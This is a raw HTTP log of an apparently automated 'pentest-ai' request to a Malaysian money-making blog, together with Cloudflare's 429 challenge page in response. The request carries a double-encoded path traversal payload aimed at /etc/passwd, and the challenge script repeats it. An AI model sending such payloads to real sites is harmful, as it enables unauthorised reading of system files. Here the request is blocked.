REQUEST:
GET https://my.myfirst.tech/blogs/latest/cara-buat-duit-online-malaysia-5-kaedah-yang-ramai-tak-tahu/files?doc=%252e%252e%2F%252e%252e%2F%252e%252e%2F%252e%252e%2F%252e%252e%2Fetc%2Fpasswd
User-Agent: pentest-ai/0.11 (+https://pentestai.xyz)



RESPONSE:
HTTP 429
Date: Fri, 17 Jul 2026 09:31:05 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 9838
Connection: close
Accept-Ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Cf-Mitigated: challenge
X-Frame-Options: SAMEORIGIN
Server: cloudflare
Critical-Ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Cross-Origin-Embedder-Policy: require-corp
Cross-Origin-Opener-Policy: same-origin
Cross-Origin-Resource-Policy: same-origin
Origin-Agent-Cluster: ?1
Permissions-Policy: accelerometer=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=(),xr-spatial-tracking=*
Referrer-Policy: same-origin
Server-Timing: chlray;desc="a1c83b4ef9f5a110"
X-Content-Type-Options: nosniff
Report-To: {"group":"cf-nel","max_age":604800,"endpoints":[{"url":"https://a.nel.cloudflare.com/report/v4?s=qcEwIAIs196TciEvNf1GdhsF1LmG6X6OaJFdP8J1%2FwWZRyaSVsZnZpMmriobMhmjc5G%2BSUUh5wDojTjI2IOcnoYS0lfpKSjefA6BG%2FrMaNQbJOs0hz3OhPjCY8koELMMDg%3D%3D"}]}
Nel: {"report_to":"cf-nel","success_fraction":0.01,"max_age":604800}
X-XSS-Protection: 1; mode=block
X-Permitted-Cross-Domain-Policies: none
X-Download-Options: noopen
CF-RAY: a1c83b4ef9f5a110-SIN
alt-svc: h3=":443"; ma=86400

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="utf-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <title>Verifying your connection...</title>

    <style type="text/css">
        *{box-sizing:border-box;margin:0;padding:0}html{font-family:"Helvetica Neue",Helvetica,Arial,sans-serif;background:#FFF;font-size:62.5%;color:#303030;min-height:100%}body{padding:0;margin:0;line-height:2.7rem}a{color:#303030;border-bottom:1px solid #303030;text-decoration:none;padding-bottom:1rem;transition:border-color 0.2s ease-in}svg{width:40%}a:hover{border-bottom-color:#A9A9A9}h1{font-weight:400;margin:0 0 1.4rem 0}p{font-size:1.5rem;margin:0}.page{padding:4rem 3.5rem;margin:0;display:flex;min-height:100vh;flex-direction:column}.text-container--main{flex:1;display:flex;align-items:start;margin-bottom:1.6rem;margin:auto}.action{border:1px solid #A9A9A9;padding:1.2rem 2.5rem;border-radius:6px;text-decoration:none;margin-top:1.6rem;display:inline-block;font-size:1.5rem;transition:border-color 0.2s ease-in}.action:hover{border-color:#000}@media all and (min-width:500px){.text-container--main{align-items:start}.page{padding:7.5rem 10.5rem}}
    </style>
<meta http-equiv="refresh" content="360"></head>

<body>
  <div class="page">
    <div class="text-container text-container--main">
      <div>
        <h1 data-i18n="content-title">Your connection needs to be verified before you can proceed</h1>
        <div class="cf-injected-html"><div class="main-wrapper" role="main"><div class="main-content"><noscript><div class="h2"><span id="challenge-error-text">Enable JavaScript and cookies to continue</span></div></noscript></div></div><script>(function(){window._cf_chl_opt = {cFPWv: 'b',cH: '36nNsB10K8D1PJkpWEFHvBFZzX.k1WSoUVA0OXv.Gck-1784280665-1.2.1.1-sMK1iocDwopsEdqnv6LZMK4SdzjNHAUVE9Qd2dwe.aYYjJPjHTJPAroAyYKHXs1.',cITimeS: '1784280665',cRay: 'a1c83b4ef9f5a110',cTplB: '0',cTplC:1,cTplO:0,cTplV:5,cType: 'managed',cUPMDTk:"/blogs/latest/cara-buat-duit-online-malaysia-5-kaedah-yang-ramai-tak-tahu/files?doc=%252e%252e%2F%252e%252e%2F%252e%252e%2F%252e%252e%2F%252e%252e%2Fetc%2Fpasswd\u0026__cf_chl_tk=MXWRge1VRcYfsnh6.QfTceRjmz7vbjYYLG2CktfjjiQ-1784280665-1.0.1.1-kOHpdSRH9hTSOjc6bdJQ3NgMNPzFdliIYg8PQqaOL58",cvId: '3',cZone: 'my.myfirst.tech',fa:"/blogs/latest/cara-buat-duit-online-malaysia-5-kaedah-yang-ramai-tak-tahu/files?doc=%252e%252e%2F%252e%252e%2F%252e%252e%2F%252e%252e%2F%252e%252e%2Fetc%2Fpasswd\u0026__cf_chl_f_tk=MXWRge1VRcYfsnh6.QfTceRjmz7vbjYYLG2CktfjjiQ-1784280665-1.0.1.1-kOHpdSRH9hTSOjc6bdJQ3NgMNPzFdliIYg8PQqaOL58",md: 'sYFfPwiy26pEED07uIm5kC5xNahO4ArzBU5MojuFHlo-1784280665-1.2.1.1-2Ee_7lWN2QYOEL0Ou3Is7wYZmOtF6auxvpx6Fq3e4uxS0ul5E8.vwC6YJ_jI0iL1SZnNgS4svTRlw2g9DrT7ajWWu.qpD9.UAjnewTsA3Z0Kh9l4uWx05_dqhVJyh_mZ0CwRpXJ.y3OG842ieJQiMF_1InaWxpshV.Mq6ZpQ3YlcFZvRkSKW8MQSGja..7QiCUJFyL7bBgDVsPWvIBTu3yQE.iG9V1VbdgqTEUjT9napc8zmQCK6MgePGxNOVmcO2SzkFGiGGHW4U3gDQMGQDZwTzp8DsSksxJ1wqmbbMqh6yCl3rjqbRKqi68tQrrYHZ.3W6mMCLF6pW9S5V_fkLEv9plOWaq_EKmzDV_rdmqAzxiQ6ytqBBEjWKLjUN6HgSj4g.lxQ6Rsi._BaqLWdMUpMbR_BU.GO3mPtfnY10wp24OZO20plhafmbQ1aPnZf1z1CbZzpwggjoFE0UIvXsqAGlsnnceaZqoOFYhm1DIesrYaInpnZQ5HYdt3CFXBYw5Ono2_unF0D1cTmzpqQuLBiqhfQZWb0r.9WjqaIyKduKVrcBS6xlHrhPNhsUXlOSIqfvhd3tYgbynpPKDIVP8EFsFZdA2qeH8fMb9ez3cNUckGzIFHKd9JjoubvcyJlUHUepicxBk8GLDu3cPPcA3zt3u3cG3Wi1dHj7LhLaWYm3wGLBWBIz3ffuPCx9lyMohZi2.RDNj_BVsUV2exNKFSRvj1XdnK5ZpnOtMJMZaX15jVS0eK8Qk57.xtlShfYSMzu2DyGC98EqUc5P08iVEW5p5IvTvyEInfjV4r6yssi7WmRAwpFtsQMaqHvviCYcW6aoeucO5Km9iK63dmoNDfWoKBlI._b.0kBEx1QK31IVVQ_QCuiVm9S9Orwz7_73DUAkUNFPtdTlYzIaCw2v_91kR3epjoxU21xB.CS7Z3MZkUQsl0zfQ8lekHqqYL8nmhbwhmSLjJl0.ZVmWoRMOw4sa9YB4b6MSISOmAB3z0D_71Q0lLY1r1Pt0DTKveq.97UXWOIF68dO_s0rMYot.WcBCTOIMm2vx6zWFF_lN8hKSFQ.t_.zKCWyOELBDaK1za8GBvpSeqc6pIzcZQJXb4rjhn41MW6UUHfpD4evYb8ki20n6Cveu7hhU9bqdgGO9WcHpVzRhrXovK4fGjgEN_cSQOtoCEjMxjGjGR9hrVeggpXrbrXJkgh4AXHQ6ggI0jhVXrxGQaVA3BqF.AFNJa5WicKyYjO9BfJ8jgiy3TkDu3sha9n8t4dsXToRxq314xCFcqgQ6wW6hC2qwRDS5krLDGnYPw2zY9dhNMCgoFIYgFVFfFSpH13OZFImpWo',mdrd: 'kgSPAFGXq8TS2rb4EBF1DyGZSzJtMlhRphPx2Ksz48k-1784280665-1.2.1.1-80WsUsZ7PTWrB5itN6uy6tPvzGCCSpxcxRr4a5n3vGC.eFAVMsZwkG9TsWjTerHiKhrY3cYAW4NHJF9eUstNIl_lzIRVHBL6H07wXDOXDP.HhaTcchsYWlhWAcadtaxUDCXEGjz6hNSB9YRK8qfl8zGOOzoxBlJ0_zKR_vJ0JuuBXr_9D.c.sz87fE_Xpv_p4eNXGlW.1rptl7rMIvA_XXoBn7heIwP9F9tys7ED0C9ewiHDFXMROVwvyqpxfuUa',};var a = document.createElement('script');a.src = '/cdn-cgi/challenge-platform/h/b/orchestrate/chl_page/v1?ray=a1c83b4ef9f5a110';window._cf_chl_opt.cOgUHash = location.hash === '' && location.href.indexOf('#') !== -1 ? '#' : location.hash;window._cf_chl_opt.cOgUQuery = location.search === '' && location.href.slice(0, location.href.length - window._cf_chl_opt.cOgUHash.length).indexOf('?') !== -1 ? '?' : location.search;if (window.history && window.history.replaceState) {var ogU = location.pathname + window._cf_chl_opt.cOgUQuery + window._cf_chl_opt.cOgUHash;history.replaceState(null, null,"/blogs/latest/cara-buat-duit-online-malaysia-5-kaedah-yang-ramai-tak-tahu/files?doc=%252e%252e%2F%252e%252e%2F%252e%252e%2F%252e%252e%2F%252e%252e%2Fetc%2Fpasswd\u0026__cf_chl_rt_tk=MXWRge1VRcYfsnh6.QfTceRjmz7vbjYYLG2CktfjjiQ-1784280665-1.0.1.1-kOHpdSRH9hTSOjc6bdJQ3NgMNPzFdliIYg8PQqaOL58"+ window._cf_chl_opt.cOgUHash);a.onload = function() {history.replaceState(null, null, ogU);}}document.getElementsByTagName('head')[0].appendChild(a);}());</script></div>
      </div>
    </div>
  </div>

  <script>
    var t = {
  "cs": {
    "title": "Vaše připojení se ověřuje...",
    "content-title": "Než budete moct pokračovat, je nutné ověřit vaše připojení"
  },
  "da": {
    "title": "Bekræfter din forbindelse ...",
    "content-title": "Din forbindelse skal bekræftes, før du kan fortsætte"
  },
  "de": {
    "title": "Deine Verbindung wird verifiziert ...",
    "content-title": "Deine Verbindung muss verifiziert werden, bevor du fortfahren kannst"
  },
  "en": {
    "title": "Verifying your connection...",
    "content-title": "Your connection needs to be verified before you can proceed"
  },
  "es": {
    "title": "Verificando la conexión...",
    "content-title": "Se debe verificar tu conexión antes de poder continuar"
  },
  "fi": {
    "title": "Yhteyttäsi todennetaan...",
    "content-title": "Yhteytesi on todennettava ennen kuin voit jatkaa"
  },
  "fr": {
    "title": "Connexion en cours de vérification...",
    "content-title": "Votre connexion doit être vérifiée avant que vous puissiez continuer"
  },
  "hi": {
    "title": "आपका कनेक्शन वेरिफ़ाई हो रहा है...",
    "content-title": "इससे पहले कि आप आगे बढ़ें आपके कनेक्शन को वेरिफ़ाई करना होगा"
  },
  "it": {
    "title": "Verifica connessione...",
    "content-title": "È necessario verificare la tua connessione prima di procedere"
  },
  "ja": {
    "title": "接続を確認しています...",
    "content-title": "続行するには接続の確認が必要です"
  },
  "ko": {
    "title": "연결 확인 중...",
    "content-title": "계속 진행하려면 연결을 확인해야 합니다."
  },
  "ms": {
    "title": "Mengesahkan sambungan anda...",
    "content-title": "Sambungan anda perlu disahkan sebelum anda boleh meneruskan"
  },
  "nb": {
    "title": "Bekreft tilkoblingen din …",
    "content-title": "Tilkoblingen din må bekreftes før du kan fortsette"
  },
  "nl": {
    "title": "Je verbinding verifiëren...",
    "content-title": "Verifieer eerst je verbinding voordat je doorgaat"
  },
  "pl": {
    "title": "Weryfikowanie połączenia...",
    "content-title": "Możesz kontynuować, dopiero gdy połączenie zostanie zweryfikowane"
  },
  "pt-BR": {
    "title": "Verificando a conexão...",
    "content-title": "A conexão precisa ser verificada para você prosseguir"
  },
  "pt-PT": {
    "title": "A verificar a sua ligação...",
    "content-title": "A sua ligação tem de ser verificada antes de prosseguir"
  },
  "sv": {
    "title": "Verifierar din anslutning ...",
    "content-title": "Din anslutning måste verifieras innan du kan fortsätta"
  },
  "th": {
    "title": "ตรวจสอบยืนยันการเชื่อมต่อของคุณ...",
    "content-title": "การเชื่อมต่อของคุณต้องได้รับการตรวจสอบยืนยันก่อนจึงจะดำเนินการต่อได้"
  },
  "tr": {
    "title": "Bağlantınız doğrulanıyor...",
    "content-title": "Devam etmeden önce bağlantınızın doğrulanması gerekir."
  },
  "vi": {
    "title": "Đang xác minh kết nối...",
    "content-title": "Bạn cần xác minh kết nối để có thế tiếp tục"
  },
  "zh-CN": {
    "title": "正在验证您的连接...",
    "content-title": "您的连接需要经过验证然后您才能继续操作"
  },
  "zh-TW": {
    "title": "正在驗證連線...",
    "content-title": "您必須先驗證連線才能繼續"
  }
};
    var language = navigator.languages && navigator.languages[0] || // Chrome / Firefox
      navigator.language ||   // All browsers
      navigator.userLanguage || // IE <= 10
      "en";
    language = language.split("-")[0]; // Strip country code
    translations = t[language] || t["en"];
    // Replace content on screen
    for (var id in translations) {
      target = document.querySelector("[data-i18n=" + id + "]");
      if (target != undefined) {
        target.innerHTML = translations[id];
      }
    }
    // Replace title tage
    document.title = translations["title"];
    // Replace language tag
    if (t[language]) { document.getElementsByTagName('html')[0].setAttribute('lang', language); };
  </script>
</body>
</html>
